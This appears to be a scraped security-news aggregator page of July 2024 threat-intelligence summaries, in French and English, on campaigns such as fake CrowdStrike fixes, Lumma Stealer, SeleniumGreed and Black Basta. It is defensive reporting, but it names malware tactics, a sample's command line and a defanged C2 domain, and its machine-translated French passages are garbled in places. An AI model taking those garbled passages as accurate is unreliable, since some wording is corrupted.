SEC News

What's new arround internet

Last one

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2024-07-29 20:46:51	PatchNow: ServiceNow Critical RCE Bugs sous Exploit actif PatchNow: ServiceNow Critical RCE Bugs Under Active Exploit (lien direct)	Un acteur de menace prétend avoir déjà rassemblé des adresses e-mail et associé des hachages à partir de plus de 110 bases de données de gestion informatique à distance. One threat actor claims to have already gathered email addresses and associated hashes from more than 110 remote IT management databases.	Threat
	2024-07-29 20:27:03	Fake CrowdStrike fixes target companies with malware, data wipers (lien direct)	## Snapshot CrowdStrike\'s recent update glitch has been exploited by threat actors who use phishing emails to deliver data wipers and remote access tools. A campaign targeting BBVA bank customers distributed the Remcos RAT under the guise of a CrowdStrike Hotfix, while the pro-Iranian hacktivist group Handala used similar tactics against Israeli companies. These attacks, stemming from a logic error in a channel file update, have significantly impacted millions of Windows systems across various sectors. ## Description AnyRun has identified the exploitation of CrowdStrike\'s update issue by threat actors, including phishing emails and malware campaigns targeting organizations with data wipers and remote access tools. Phishing emails have been observed attempting to take advantage of the disruption, with a malware campaign targeting BBVA bank customers offering a fake CrowdStrike Hotfix update that installs the Remcos RAT. The pro-Iranian hacktivist group Handala has also leveraged the situation by sending phishing emails that impersonate CrowdStrike to Israeli companies to distribute the data wiper. Additionally, attackers are distributing a data wiper under the pretense of delivering an update from CrowdStrike, decimating systems by overwriting files with zero bytes and reporting it over Telegram. The defect in CrowdStrike\'s software update had a massive impact on Windows systems at numerous organizations, making it too good an opportunity for cybercriminals to pass. The cause of the outage was identified as a channel file update to Windows hosts triggering a logic error, leading to a crash. The impact on Windows systems at numerous organizations was significant, with millions of devices affected and disruptions across various sectors. ## Detections/Hunting Queries Microsoft Defender Antivirus detects threat components as the following malware: - [Backdoor:JS/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Remcos) - [Trojan:Win32/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Remcos) - [PWS:Win32/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PWS:Win32/Remcos) - [Backdoor:MSIL/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MSIL/Remcos) - [Backdoor:Win32/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Remcos) - [TrojanDownloader:AutoIt/Remcos](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:AutoIt/Remcos) - [Trojan:Win32/HijackLoader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/HijackLoader.AHJ!MTB&threatId=-2147058662) ## References [Fake CrowdStrike fixes target companies with malware, data wipers.](https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/) Bleeping Computer (accessed 2024-07-22) [Find Threats Exploiting CrowdStrike Outage with TI Lookup.](https://any.run/cybersecurity-blog/crowdstrike-outage-abuse/?utm_source=twitter&utm_medium=post&utm_campaign=outageabuse&utm_content=blog&utm_term=230724) Any Run (accessed 2024-07-24) [HijackLoader Updates](https://security.microsoft.com/intel-explorer/articles/8c997d7c). Microsoft (accessed 2024-07-23) ## Copyright © Microsoft 2024. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited. ## Snapshot CrowdStrike\'s recent update glitch has been exploited by threat actors who use phishing emails to deliver data wipers and remote access tools. A campaign targeting BBVA bank customers distributed the Remcos RAT under the guise of a CrowdStrike Hotfix, while the pro-Iranian hacktivist group Handala used	Malware Tool Threat
	2024-07-29 20:15:06	SeleniumGreed: Threat actors exploit exposed Selenium Grid services for Cryptomining (lien direct)	## Snapshot Wiz researchers identified a threat campaign, referred to as "SeleniumGreed," exploiting a misconfiguration in Selenium Grid, a widely used web app testing framework, to deploy a modified XMRig tool for mining Monero cryptocurrency. ## Description The attackers leverage the lack of default authentication in Selenium Grid to access app-testing instances, download files, and execute commands. By manipulating the Selenium WebDriver API, threat actors establish a reverse shell, drop a custom XMRig miner, and use compromised Selenium node workloads as intermediate command and control servers (C2) for subsequent infections and mining pool proxies. The campaign targets older versions of Selenium but is also possible on more recent versions, potentially evading detection by targeting less maintained and monitored instances. ## Additional Analysis [XMRig miner](https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/xmrig-malware/) is a popular open-source software designed for mining cryptocurrencies, particularly Monero (XMR). Developed in C++, XMRig is efficient and versatile, supporting various algorithms, mining pools, and running on multiple platforms like Windows, Linux, and macOS. However, it has been widely misused by cybercriminals who deploy it through malware to hijack the computing resources of unsuspecting victims, a practice known as cryptojacking. This unauthorized use of systems significantly degrades performance, increases energy consumption, and can cause hardware damage over time. Due to its frequent abuse in malicious campaigns, XMRig miner has become a focal point in discussions about cybersecurity threats related to resource hijacking and cryptomining. ## References [SeleniumGreed: Threat actors exploit exposed Selenium Grid services for Cryptomining](https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps). Wiz (accessed 2024-07-29) [XMRig Malware](https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/xmrig-malware/). Check Point (accessed 2024-07-29) ## Copyright © Microsoft 2024. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited. ## Snapshot Wiz researchers identified a threat campaign, referred to as "SeleniumGreed," exploiting a misconfiguration in Selenium Grid, a widely used web app testing framework, to deploy a modified XMRig tool for mining Monero cryptocurrency. ## Description The attackers leverage the lack of default authentication in Selenium Grid to access app-testing instances, download files, and execute commands. By manipulating the Selenium WebDriver API, threat actors establish a reverse shell, drop a custom XMRig miner, and use compromised Selenium node workloads as intermediate command and control servers (C2) for subsequent infections and mining pool proxies. The campaign targets older versions of Selenium but is also possible on more recent versions, potentially evading detection by targeting less maintained and monitored instances. ## Additional Analysis [XMRig miner](https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/xmrig-malware/) is a popular open-source software designed for mining cryptocurrencies, particularly Monero (XMR). Developed in C++, XMRig is efficient and versatile, supporting various algorithms, mining pools, and running on multiple platforms like Windows, Linux, and macOS. However, it has been widely misused by cybercriminals who deploy it through malware to hijack the computing resources of unsuspecting victims, a practice known as cryptojacking. This unauthorized use of systems significantly degrades performance, increases energy consumption, and can cause hardware damage over time. Due to its frequent abuse in malicious campaigns, XMRig miner has become a focal point in discussions about cybersecurity threats related to resource hijacking and cryp	Malware Tool Threat
	2024-07-29 20:07:18	Lumma Stealer Packed with CypherIt Distributed Using Falcon Sensor Update Phishing Lure (lien direct)	## Snapshot CrowdStrike Intelligence identified a phishing domain which impersonates CrowdStrike and delivers malicious ZIP and RAR files that ultimately executes Lumma Stealer packed with CypherIt. Read more about [Lumma Stealer here.](https://security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad) ## Description The campaign is likely linked to a June 2024 Lumma Stealer distribution campaign in which a threat actor leveraged advanced social-engineering techniques, such as using spam floods and voice phishing (vishing), to deliver malicious binaries. The MSI loader displays a decoy installation and upon execution, it extracts and executes a self-extracting RAR (SFX) file, plenrco.exe, with the command line plenrco.exe -pqwerty2023 -s1. This extracts another RAR SFX archive file stored in the PE overlay plenrco.exe. The RAR archive contains a Nullsoft Scriptable Install System (NSIS) installer with the filename SymposiumTaiwan.exe. The NSIS installer contains fragments of a legitimate AutoIt executable and a compiled AutoIt script. The NSIS also contains a batch script loader named Open.cmd, which includes useless code to hide the actual functionality. The final payload is RC4-encrypted and LZNT1-compressed, resulting in a Lumma Stealer sample. The decompiled AutoIt script is a CypherIt loader that is heavily obfuscated to hinder static analysis. The loader implements string obfuscation and terminates if certain checks are met, such as specific hostnames or antivirus processes running. The AutoIt loader contains two shellcodes for 32-bit and 64-bit systems that implement the RC4 algorithm to decrypt the final payload, which is also hardcoded within the AutoIt loader. The final payload is a Lumma Stealer executable that contacts the command-and-control (C2) server included in IOCs at the time of analysis. Additionally, the same C2 domain identified in this activity was observed in a recent widespread opportunistic spam flood and voice phishing (vishing) campaign in June 2024. Based on the shared infrastructure between the campaigns and apparent targeting of corporate networks, CrowdStrike Intelligence assesses with moderate confidence that the activity is likely attributable to the same unnamed threat actor. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc). - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-	Spam Tool Threat
	2024-07-29 18:49:00	ProofPoint Email Routing Flaw exploité pour envoyer des millions d'e-mails de phishing usurpés Proofpoint Email Routing Flaw Exploited to Send Millions of Spoofed Phishing Emails (lien direct)	Un acteur de menace inconnue a été lié à une campagne d'arnaque massive qui a exploité une mauvaise configuration de la routage des e-mails dans les défenses du fournisseur de sécurité par courrier électronique \\ pour envoyer des millions de messages usurpant diverses entreprises légitimes. "Ces e-mails ont fait écho à partir des relais de messagerie de point de preuve officiel avec des signatures SPF et DKIM authentifiées, contournant ainsi les principales protections de sécurité - tout cela à tromper An unknown threat actor has been linked to a massive scam campaign that exploited an email routing misconfiguration in email security vendor Proofpoint\'s defenses to send millions of messages spoofing various legitimate companies. "These emails echoed from official Proofpoint email relays with authenticated SPF and DKIM signatures, thus bypassing major security protections - all to deceive	Threat
	2024-07-29 18:01:57	Malicious Inauthentic Falcon Crash Reporter Installer Distributed to German Entity via Spearphishing Website (lien direct)	#### Géolocations ciblées - Allemagne ## Instantané Crowdsstrike Intelligence a identifié une tentative de sportinging offrant un faux installateur de reporter crash cowdsstrike via un site Web imitant une entité allemande. ## Description Le site a été enregistré le 20 juillet 2024, peu de temps après un problème de mise à jour du capteur Falcon CrowdStrike, et a utilisé JavaScript déguisé en jQuery pour télécharger et désobfusquer le programme d'installation.Ce programme d'installation, marqué de contenu Crowdsstrike et localisé en allemand, a nécessité un mot de passe pour l'installation.La page de phishing liée à un fichier zip contenant un installateur innosetup malveillant et affiché la marque de Crowdstrike \\ semble légitime. Le JavaScript a masqué son code malveillant dans un véritable code jQuery pour échapper à la détection.Lorsque l'utilisateur a cliqué sur le bouton de téléchargement, le site a exécuté une fonction pour télécharger un fichier exécutable portable déguisé.Le programme d'installation, qui est apparu le 20 juillet 2024, avait un horodatage aligné avec la mise à jour du capteur, suggérant l'utilisation de l'horodatage pour éviter la détection. Le programme d'installation a incité les utilisateurs à saisir un mot de passe spécifique "serveur backend", probablement connu uniquement des cibles, indiquant une attaque très ciblée.Crowdstrike Intelligence a évalué avec une grande confiance que les attaquants se sont concentrés sur les clients germanophones touchés par le problème du capteur Falcon et ont utilisé des techniques avancées antiformes, notamment l'enregistrement des sous-domaines sous un registraire légitime et le contenu des installateurs. ## Analyse supplémentaire Les acteurs du cybermenace exploitent les événements actuels pour perpétrer une activité malveillante car ces situations créent souvent de la confusion et de l'urgence, rendant les individus et les organisations plus vulnérables à la tromperie.Ils capitalisent sur l'intérêt accru et l'attention entourant de tels événements pour augmenter la probabilité que leurs tentatives de phishing et d'autres attaques réussissent.En alignant leurs campagnes malveillantes avec des incidents ou des mises à jour bien connues, les acteurs de la menace peuvent plus facilement masquer leurs intentions et attirer les victimes pour compromettre involontairement leur sécurité. Cette campagne de phishing ciblant les clients germanophones est le dernier exemple de cyberattaques exploitant le chaos de la mise à jour de Falcon de Crowdsstrike.Les rapports antérieurs d'activité malveillante lors des pannes incluent [les essuie-glaces de données réparties par le groupe hacktiviste pro-iranien handala] (https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/), [HijackLoader dropping Remcos Remote Access Trojan](https://x.com/anyrun_app/status/1814567576858427410) disguised as a CrowdStrike hotfix, and information stealer[Daolpu] (https://www.crowdstrike.com/blog/fake-recovery-manUAL-UND-TO-DIVER-UNDENDIFIED SECELER /) Se propager par des e-mails de phishing se faisant passer pour un outil de récupération. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc)Le défenseur du point f	Ransomware Malware Tool Threat
	2024-07-29 14:58:44	29 juillet & # 8211;Rapport de renseignement sur les menaces 29th July – Threat Intelligence Report (lien direct)	> Pour les dernières découvertes en cyberLes meilleures attaques et violation de la Cour supérieure de Los Angeles ont été contraints de fermer son réseau à la suite d'une attaque de ransomware.La Cour, la plus grande des États-Unis, a clôturé tous ses 36 palais de justice [& # 8230;] >For the latest discoveries in cyber research for the week of 29th July, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The Superior Court of Los Angeles was forced to shut down its network following a ransomware attack. The court, the largest in the United States, has closed all of its 36 courthouse […]	Ransomware Threat
	2024-07-29 14:16:16	Agir: comment lutter contre les répercussions financières d'un cyber-incident Taking action: how to combat the financial repercussions of a cyber incident (lien direct)	Paying hackers not to release the data they have stolen from you is not the best way to manage the financial repercussions of a cyber-attack. Nor is trying hide the attack from the authorities…. Even the most vigilant companies can\'t escape the possibility of having to handle a cyber threat - and the cost of […] The post Taking action: how to combat the financial repercussions of a cyber incident first appeared on IT Security Guru. Paying hackers not to release the data they have stolen from you is not the best way to manage the financial repercussions of a cyber-attack. Nor is trying hide the attack from the authorities…. Even the most vigilant companies can\'t escape the possibility of having to handle a cyber threat - and the cost of […] The post Taking action: how to combat the financial repercussions of a cyber incident first appeared on IT Security Guru.	Threat
	2024-07-29 14:00:00	Unc4393 entre doucement dans la nuit silencieuse UNC4393 Goes Gently into the SILENTNIGHT (lien direct)	Written by: Josh Murchie, Ashley Pearson, Joseph Pisano, Jake Nicastro, Joshua Shilko, Raymond Leong Overview In mid-2022, Mandiant\'s Managed Defense detected multiple intrusions involving QAKBOT, leading to the deployment of BEACON coupled with other pre-ransomware indicators. This marked Mandiant\'s initial identification of UNC4393, the primary user of BASTA ransomware. Mandiant has responded to over 40 separate UNC4393 intrusions across 20 different industry verticals. While healthcare organizations have not traditionally been a focus for UNC4393, several breaches in the industry this year indicate a possible expansion of their interests. However, this represents only a fraction of the cluster\'s victims, with the Black Basta data leak site purporting over 500 victims since inception. Over the course of this blog post, Mandiant will detail the evolution of UNC4393\'s operational tactics and malware usage throughout its active lifespan, with a focus on the period following the QAKBOT botnet takedown. We will highlight the cluster\'s transition from readily available tools to custom malware development as well as its evolving reliance on access brokers and diversification of initial access techniques. Figure 1: UNC4393 intrusion lifecycle Attribution and Targeting UNC4393 is a financially motivated threat cluster, and the primary user of BASTA ransomware, tracked since mid-2022 but likely active since early 2022 based on activity on the BASTA DLS. The group has overwhelmingly leveraged initial access gained via UNC2633 and UNC2500 QAKBOT botnet infections to deploy BASTA ransomware. QAKBOT is typically distributed via phishing emails containing malicious links or attachments. In some cases, HTML smuggling has also been used to distribute ZIP files containing IMG files that house LNK files and QAKBOT payloads. Mandiant suspects BASTA operators maintain a private or small, closed-invitation affiliate model whereby only trusted third-party actors are provided with use of the BASTA encryptor. Unlike traditional ransomware-as-a-service (RaaS), BASTA is not publicly marketed and its operators do not appear to actively recruit affiliates to deploy the ransomware. Instead, they focus on acquiring initial access via partnerships or purchases in underground communities. This deviates from traditional RaaS models, which focus on the ransomware development and related services such as the data leak site (DLS) that are provided to affiliates in exchange for directly distributing the ransomware. While UNC4393 is the only currently active threat cluster deploying BASTA that Mandiant tracks, we cannot rule out the possibility that other, vetted threat actors may also be given access to the encrypter. The hundreds of BASTA ransomware victims claimed on the DLS appear credible due to UNC4393\'s rapid operational tempo. With a median time to ransom of approximately 42 hours, UNC4393 has demonstrated p	Ransomware Malware Tool Threat Prediction Medical Cloud
	2024-07-29 12:35:00	\\ 'Stargazer Goblin \\' crée 3 000 faux comptes GitHub pour la diffusion de logiciels malveillants \\'Stargazer Goblin\\' Creates 3,000 Fake GitHub Accounts for Malware Spread (lien direct)	Un acteur de menace connu sous le nom de Stargazer Goblin a mis en place un réseau de comptes GitHub inauthentiques pour alimenter une distribution en tant que service (DAAS) qui propage une variété de logiciels malveillants qui volent l'information et leur rapportent 100 000 $ en bénéfices illicites au cours de la dernière année. Le réseau, qui comprend plus de 3 000 comptes sur la plate-forme d'hébergement de code basé sur le cloud, couvre des milliers de référentiels utilisés A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware and netting them $100,000 in illicit profits over the past year. The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to	Malware Threat
	2024-07-29 12:20:53	Pour contrer les menaces graves à la sécurité de l\'information, Apacer fournit des solutions pour la récupération des systèmes d\'entreprise et la sécurité des données (lien direct)	Avec le développement rapide des applications de l'IA dans divers domaines, les entreprises s'appuient de plus en plus sur les données. Les questions de sécurité de l'information, telles que les mesures pour s'assurer que les données ne sont pas perdues ou utilisées de manière inappropriée, sont devenues cruciales. Apacer comprend parfaitement à quel point les données des entreprises peuvent être irremplaçables. Grâce à l'amélioration continue de sa technologie exclusive de sauvegarde et de restauration au fil des ans, Apacer (8271) s'efforce de répondre aux nombreux besoins générés par diverses applications industrielles. - Produits	Threat
	2024-07-29 11:20:29	Ce que chaque entreprise doit savoir sur les ransomwares What Every Business Needs to Know About Ransomware (lien direct)	Les entreprises d'aujourd'hui comptent fortement sur la technologie pour rationaliser les opérations, améliorer la productivité et se connecter avec les clients.Cependant, cette dépendance a également ouvert la porte à une menace croissante: les attaques du ransomware.D'ici 2031, le coût des attaques de ransomwares devrait atteindre 265 milliards de dollars (USD) par an.La croissance rapide des attaques de ransomwares a fait de cette cyber-menace [...] Today\'s businesses rely heavily on technology to streamline operations, enhance productivity, and connect with customers. However, this dependency has also opened the door to a growing threat: ransomware attacks. By 2031, the cost of ransomware attacks is estimated to reach $265 billion (USD) annually. The rapid growth of ransomware attacks has made this cyber threat [...]	Ransomware Threat
	2024-07-29 10:58:35	Weekly OSINT Highlights, 29 July 2024 (lien direct)	## Snapshot Key trends from last week\'s OSINT reporting include novel malware, such as Flame Stealer and FrostyGoop, the compromise of legitimate platforms like Discord and GitHub, and state-sponsored threat actors conducting espionage and destructive attacks. Notable threat actors, including Russian groups, Transparent Tribe, FIN7, and DPRK\'s Andariel, are targeting a wide range of sectors from defense and industrial control systems to financial institutions and research entities. These attacks exploit various vulnerabilities and employ advanced evasion techniques, leveraging both traditional methods and emerging technologies like AI-generated scripts and RDGAs, underscoring the evolving and persistent nature of the cyber threat landscape. ## Description 1. [Widespread Adoption of Flame Stealer](https://sip.security.microsoft.com/intel-explorer/articles/f610f18e): Cyfirma reports Flame Stealer\'s use in stealing Discord tokens and browser credentials. Distributed via Discord and Telegram, this malware targets various platforms, utilizing evasion techniques like DLL side-loading and data exfiltration through Discord webhooks. 2. [ExelaStealer Delivered via PowerShell](https://sip.security.microsoft.com/intel-explorer/articles/5b4a34b0): The SANS Technology Institute Internet Storm Center reported a threat involving ExelaStealer, downloaded from a Russian IP address using a PowerShell script. The script downloads two PE files: a self-extracting RAR archive communicating with "solararbx\[.\]online" and "service.exe," the ExelaStealer malware. The ExelaStealer, developed in Python, uses Discord for C2, conducting reconnaissance activities and gathering system and user details. Comments in Russian in the script and the origin of the IP address suggest a Russian origin. 3. [FrostyGoop Disrupts Heating in Ukraine](https://sip.security.microsoft.com/intel-explorer/articles/cf8f8199): Dragos identified FrostyGoop malware in a cyberattack disrupting heating in Lviv, Ukraine. Linked to Russian groups, the ICS-specific malware exploits vulnerabilities in industrial control systems and communicates using the Modbus TCP protocol. 4. [Rhysida Ransomware Attack on Private School](https://sip.security.microsoft.com/intel-explorer/articles/4cf89ad3): ThreatDown by Malwarebytes identified a Rhysida ransomware attack using a new variant of the Oyster backdoor. The attackers used SEO-poisoned search results to distribute malicious installers masquerading as legitimate software, deploying the Oyster backdoor. 5. [LLMs Used to Generate Malicious Code](https://sip.security.microsoft.com/intel-explorer/articles/96b66de0): Symantec highlights cyberattacks using Large Language Models (LLMs) to generate malware code. Phishing campaigns utilize LLM-generated PowerShell scripts to download payloads like Rhadamanthys and LokiBot, stressing the need for advanced detection against AI-facilitated attacks. 6. [Stargazers Ghost Network Distributes Malware](https://sip.security.microsoft.com/intel-explorer/articles/62a3aa28): Check Point Research uncovers a network of GitHub accounts distributing malware via phishing repositories. The Stargazer Goblin group\'s DaaS operation leverages over 3,000 accounts to spread malware such as Atlantida Stealer and RedLine, targeting both general users and other threat actors. 7. [Crimson RAT Targets Indian Election Results](https://sip.security.microsoft.com/intel-explorer/articles/dfae4887): K7 Labs identified Crimson RAT malware delivered through documents disguised as "Indian Election Results." Transparent Tribe APT, believed to be from Pakistan, targets Indian diplomatic and defense entities using macro-embedded documents to steal credentials. 8. [AsyncRAT Distributed via Weaponized eBooks](https://sip.security.microsoft.com/intel-explorer/articles/e84ee11d): ASEC discovered AsyncRAT malware distributed through weaponized eBooks. Hidden PowerShell scripts within these eBooks trigger the AsyncRAT payload, which uses obfuscation and anti-detection techniques to exfiltrate data.	Ransomware Data Breach Spam Malware Tool Vulnerability Threat Legislation Mobile Industrial Medical	APT 28 APT 36
	2024-07-29 10:07:25	Capgemini piratée par l\'un de ses employés (lien direct)	Insider threat : le pirate de l\'entreprise Capgemini n\'était autre qu\'un de ses employés.... Insider threat : le pirate de l\'entreprise Capgemini n\'était autre qu\'un de ses employés....	Threat
	2024-07-29 10:00:05	Mandrake Spyware se faufile à nouveau sur Google Play, volant sous le radar pendant deux ans Mandrake spyware sneaks onto Google Play again, flying under the radar for two years (lien direct)	Les acteurs de menace spyware de Mandrake reprennent des attaques avec de nouvelles fonctionnalités ciblant les appareils Android tout en étant accessible au public sur Google Play. Mandrake spyware threat actors resume attacks with new functionality targeting Android devices while being publicly available on Google Play.	Threat Mobile
	2024-07-29 10:00:00	Pourquoi vous avez besoin d'un pare-feu d'application Web en 2024 Why You Need a Web Application Firewall in 2024 (lien direct)	The content of this post is solely the responsibility of the author. LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article. Over the last decade, web applications have become integral to everyday life. This includes business and personal activities, facilitating everything from banking and transactions to marketing and social networking. This rise in popularity has made web applications a prime target for cybercriminals. According to Verizon’s 2024 Data Breach Investigation Report, nearly 40% of cybersecurity incidents result from web application vulnerabilities. Businesses relying on these applications for everyday operations must implement robust security measures to ensure their app stack is resilient to threats and capable of maintaining uninterrupted service. One of the most effective tools for safeguarding web applications is a web application firewall (WAF), which provides critical protection against a wide range of cyber threats. Most Common Threats to Web App Security Before we dive into how web application firewalls protect our web assets, let’s look at the most pressing security threats facing web applications in 2024. Stolen credentials are top of mind, as millions are available for sale on the dark web. One of the most significant cyberattacks of the year involved compromised credentials from a third-party application in an attack on UnitedHealth, which jeopardized the data of one-third of Americans. Attackers were nested inside the victim’s systems for months before striking, highlighting how important real-time monitoring capabilities are for detecting suspicious behavior. Zero-day exploits are also a common vector attackers have used in recent years to breach web applications. A zero-day vulnerability is unknown to the application vendor or the public at the time it is discovered and exploited by attackers. They can be quite dangerous if they’re not identified and patched quickly. In 2023, there were 97 reported zero-day vulnerabilities, a 50% increase from the year before. Additionally, as web applications increasingly rely on each other to provide maximum functionality to the end user, API-related attacks have also become prevalent. App integrations must be executed correctly with strong authentication and authorization mechanisms. Input validation is also required to prevent injection attacks. Modern WAF Solutions Are Essential to Improving Security A web application firewall is a hardware or software-based solution used to monitor and filter HTTP traffic between a web application and the internet. WAFs provide two essential security features: traffic filtering and real-time monitoring. WAFs use rule-based filters to inspect HTTP requests and responses. These filters detect and block a wide spectrum of attacks, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). By analyzing traffic in real time, a WAF solution can identify and mitigate threats as they occur, foiling attacks before	Data Breach Tool Vulnerability Threat
	2024-07-29 06:00:58	De réactif à proactif: identifier les utilisateurs risqués en temps réel pour arrêter les menaces d'initié From Reactive to Proactive: Identify Risky Users in Real Time to Stop Insider Threats (lien direct)	Insider threats can come from anywhere at any time. Although there are well-known insider threat indicators and trigger events, one of the most challenging aspects of containing insider threats is identifying a user who may cause harm to the business-intentionally or not. This uncertainty can be daunting. And it is one of the reasons that insider threats are a leading challenge for CISOs globally. Insider threat investigations are typically reactive. Cybersecurity administrators focus on risky users like leavers, employees on a performance improvement plan, or contractors once they learn about their potential risk to the company. This is a valid way to manage known risks. But how can a business manage unknown risks? Proofpoint Insider Threat Management (ITM) has capabilities to help security teams do exactly that with dynamic policies on the endpoint. Reactive monitoring poses challenges The riskiest users in a business tend to fall into several categories. They include users who: Exhibit risky behavior, like downloading a high volume of sensitive files Belong to a predetermined risky user group; some examples include departing employees, privileged users with access to sensitive data and systems, and Very Attacked People™ Have a high-risk score based on a number of indicators Security teams typically build manual policies to monitor these users for unusual or risky behavior. When a user\'s activity violates corporate policy, their activity is detected by and visible to security teams. Security teams can continue to monitor the user and apply prevention controls when needed. This is a sound approach. But it relies on identifying the risky user ahead of time, monitoring their behavior and making manual changes to policies. For teams who may not have an approach to identify risky users, they may decide to monitor all users as “risky.” However, collecting data on all users is inefficient. It burdens the security team with too many alerts and false positives. Another challenge for security teams is protecting users\' privacy to meet compliance requirements. Capturing visuals like screenshots in an insider threat investigation is crucial. It can provide irrefutable evidence that can be used to prove a user\'s intentions. However, the collection of such information all the time poses privacy concerns, especially in regions with strict privacy regulations. Balancing security with privacy controls requires that data collection occur on a need-to-know basis. Identify risky users with dynamic policies Proofpoint ITM alleviates the challenge of knowing who your riskiest users are at all times. With dynamic policies for the endpoint, security teams do not need to write policies based on specific users or groups. Instead, they can dynamically and flexibly change a user\'s monitoring policy in real time if a user triggers an alert. Dynamic policies allow security teams to do the following: Change the endpoint agent policy from metadata-only to screenshot mode for a specified time frame before and after an alert Capture screenshots only when behavior is risky and an alert is generated, thereby protecting the privacy of the user Define when visibility and control policies are scaled up or down on the endpoint User scenario: a departing employee Let\'s walk through an example of a departing employee. Evan is a researcher at a global life sciences company. She has access to sensitive vaccine data due to the nature of her role. Evan is being monitored as a low-risk user. That means metadata is being captured when she moves data, such as uploading a PPT file with sensitive data to a partner\'s website or uploading a strategy document to the company\'s cloud sync folder. However, Evan\'s behavior, such as tampering with the Windows registry or any security controls, or downloading an unapproved application, are not captured. Evan is goin	Threat Cloud
	2024-07-29 01:00:00	Scammer abuse des locataires Microsoft 365, en relayant les serveurs de preuves pour livrer des campagnes de spam Scammer Abuses Microsoft 365 Tenants, Relaying Through Proofpoint Servers to Deliver Spam Campaigns (lien direct)	Key Findings In March, Proofpoint researchers identified spam campaigns being relayed through a small number of Proofpoint customers\' email infrastructure by sending spam from Microsoft 365 tenants All analyses indicate this activity was conducted by one spam actor, whose activity we do not attribute to a known entity The root cause is a modifiable email routing configuration feature on Proofpoint servers to allow relay of organizations\' outbound messages from Microsoft 365 tenants, but without specifying which M365 tenants to allow To resolve the issue, Proofpoint implemented a streamlined administrative interface for customers to specify which M365 tenants are allowed to relay, with all other M365 tenants denied by default Any email infrastructure that offers this email routing configuration feature can be abused by spammers Proofpoint Essentials customers are not affected, as configuration settings are already set that prevent unauthorized relay abuse This issue did not expose any Proofpoint customer data, and no customer experienced any data loss as a result We are sharing what we know about these campaigns to help others mitigate this issue and prevent further unauthorized abuse, as it is not unique to Proofpoint Abusing an Outbound Email Relay Configuration to Conduct Spam Campaigns In March 2024, Proofpoint observed spam campaigns being relayed from Microsoft 365 tenants through several Proofpoint enterprise customers\' email infrastructures, targeting users of free email providers such as Yahoo, Gmail, and GMX. The commonality shared between all the customers whose email infrastructures were being abused was a modifiable configuration setting that allowed outbound messages to be relayed from Microsoft 365. Spammers can therefore abuse any email infrastructure that allows messages to be relayed from email hosting services through their infrastructure. This specific email routing configuration abused by the spammer allowed outbound messages to be sent from a customer\'s Microsoft 365 tenant for relay through their infrastructure, but it did not limit the Microsoft tenants allowed to relay. The spammer, whose activity we do not attribute to a known entity, controlled Microsoft 365 tenants that used random strings of letters and numbers, such as 23gdfs56gsd.onmicrosoft.com, for some of the spam messages. Some of the spam made no attempt to disguise the sender address and used the oddly named Microsoft tenant names as the sending domain. Some of spam used the onmicrosoft.com tenant names in the “from” field and other spam messages spoofed the sender email, not all of which were successfully delivered. Interestingly, while the spammer tried this against several Proofpoint infrastructures, some accepted the messages for relay while others 